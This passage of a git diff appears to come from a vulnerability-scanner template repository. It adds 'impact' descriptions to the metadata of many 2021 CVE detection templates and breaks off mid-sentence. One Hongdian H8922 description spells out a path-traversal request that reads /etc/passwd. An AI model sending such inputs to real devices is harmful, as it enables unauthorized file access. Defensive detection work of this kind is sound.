@@ -5,6 +5,8 @@ info: author: idealphase,daffainfo severity: critical description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Pega Infinity application. remediation: | Apply the necessary security patches or updates provided by Pega Infinity to mitigate the authentication bypass vulnerability (CVE-2021-27651). reference: diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index e32163c677..4eeebf3dd7 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: critical description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index 055b63b576..11959f2e93 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index e917fc45fe..d799bfe3f8 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Apache to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 0db18cbab7..04cd5c694c 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -5,6 +5,8 @@ info: author: hackergautam severity: critical description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: This issue is resolved in Apache Solr 8.8.2 and later. reference: - https://www.anquanke.com/post/id/238201 
diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 6a9ade1838..d0cddd46a1 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -5,6 +5,8 @@ info: author: kiransau severity: medium description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index 28d5a548cf..6e7949089f 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: critical description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server compromise, or further attacks on internal systems. remediation: | Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml index e67ff20802..7ff2de4d89 100644 --- a/http/cves/2021/CVE-2021-28073.yaml +++ b/http/cves/2021/CVE-2021-28073.yaml 
@@ -5,6 +5,8 @@ info: author: z3bd severity: critical description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2 + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information and potential compromise of the affected system. remediation: Upgrade to version 4.3 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27573 diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index 3f068794ef..5499859f1c 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files, potentially leading to further compromise of the system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices. reference: diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 460ebad7ed..035227403f 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users. remediation: | Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). reference: diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 9d42e5213f..8d45e6e4b5 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Apply the latest security patch or update to a non-vulnerable version of the Hongdian H8922 firmware. reference: diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 802b0581a2..092459817e 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application. + impact: | + An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 79e008577d..1a3f6e8474 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure. Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Upgrade to Eclipse Jetty version 9.4.40 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 4c090d416e..0294221a63 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing remote code execution. remediation: | Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index 8679d0e00b..1dd636196d 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to a patched version of SEO Panel or apply the necessary security patches. reference: diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml index af172ac5ad..668847f255 100644 --- a/http/cves/2021/CVE-2021-28854.yaml +++ b/http/cves/2021/CVE-2021-28854.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: high description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as user credentials or customer data. remediation: | Apply the latest security patches and updates provided by VICIdial to fix the vulnerability and ensure sensitive information is properly protected. reference: diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index a25902df3e..de0a8001d2 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -5,6 +5,8 @@ info: author: johnjhacking severity: critical description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index 1c7939eb7d..ba9b613203 100644 --- a/http/cves/2021/CVE-2021-28937.yaml 
+++ b/http/cves/2021/CVE-2021-28937.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext. + impact: | + An attacker can obtain the repeater's password, compromising the security of the network. remediation: | Update the firmware to the latest version or replace the vulnerable repeater with a secure alternative. reference: diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index d7b3bc6058..f887144563 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -5,6 +5,8 @@ info: author: melbadry9,xelkomy severity: high description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval. + impact: | + Allows an attacker to execute arbitrary LDAP queries and potentially gain unauthorized access to sensitive information or perform unauthorized actions remediation: Upgrade to OpenAM commercial version 13.5.1 or later. reference: - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ https://portswigger.net/research/hidden-oauth-attack-vectors diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 0fb241a132..e6e4d27e6f 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system. remediation: | Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 35f536ad0b..feade9d5d0 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -12,6 +12,8 @@ info: enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server. remediation: | Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441). reference: diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index daae5bdf0e..6bace351a0 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server. remediation: | Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29442). reference: diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index ca9ec3869e..007b4b0da7 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: medium description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: This issue has been fixed in 4.3.3. reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index bba755cc71..d977cb4beb 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + impact: | + This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the target system. remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". reference: - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index b6af5b8aab..07ff826427 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Patched in 1.4.17. reference: - https://paper.seebug.org/1543/ diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index e096903fee..c5b90c1a2e 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the disclosure of sensitive information. remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus. reference: - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 9d29bca843..9bc1759b4f 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the Adminer interface, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). reference: - https://sourceforge.net/p/adminer/bugs-and-features/797/ diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 23a0794799..ae5371c675 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 728d92892d..75c7b06f9b 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SysAid Technologies 20.3.64 b14 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index db9b142c38..e5eb37b216 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d severity: critical description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 871c1ec18c..c9ca4307d3 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 33f8fb0c06..5f12240bd5 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking. remediation: | Upgrade to Sidekiq version 6.2.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index d2d6df41dc..dafc2f7cfd 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. + impact: | + An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 06aabc0b86..df93c736e5 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0. reference: diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index a62c6f39a9..e256dc6d7e 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet. + impact: | + This vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Apply the latest patch or upgrade to a version that has fixed the vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 1ddff837ee..98a29f3d1e 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3. reference: diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 09fa5f6e6b..c1836363a1 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 7ebab45652..0424188627 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2. reference: diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index b939fd561e..d40819c6cd 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop. reference: diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 705b5f5110..1455b245ca 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml 
@@ -5,6 +5,8 @@ info: author: infosecsanyam severity: medium description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index a185a0d543..c19030333c 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, unauthorized access, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 8621e74c23..ad77cf9df4 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages. reference: diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index 1020a981b1..452aadd7a7 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -5,6 +5,8 @@ info: author: z3bd,pdteam severity: critical description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. + impact: | + Successful exploitation 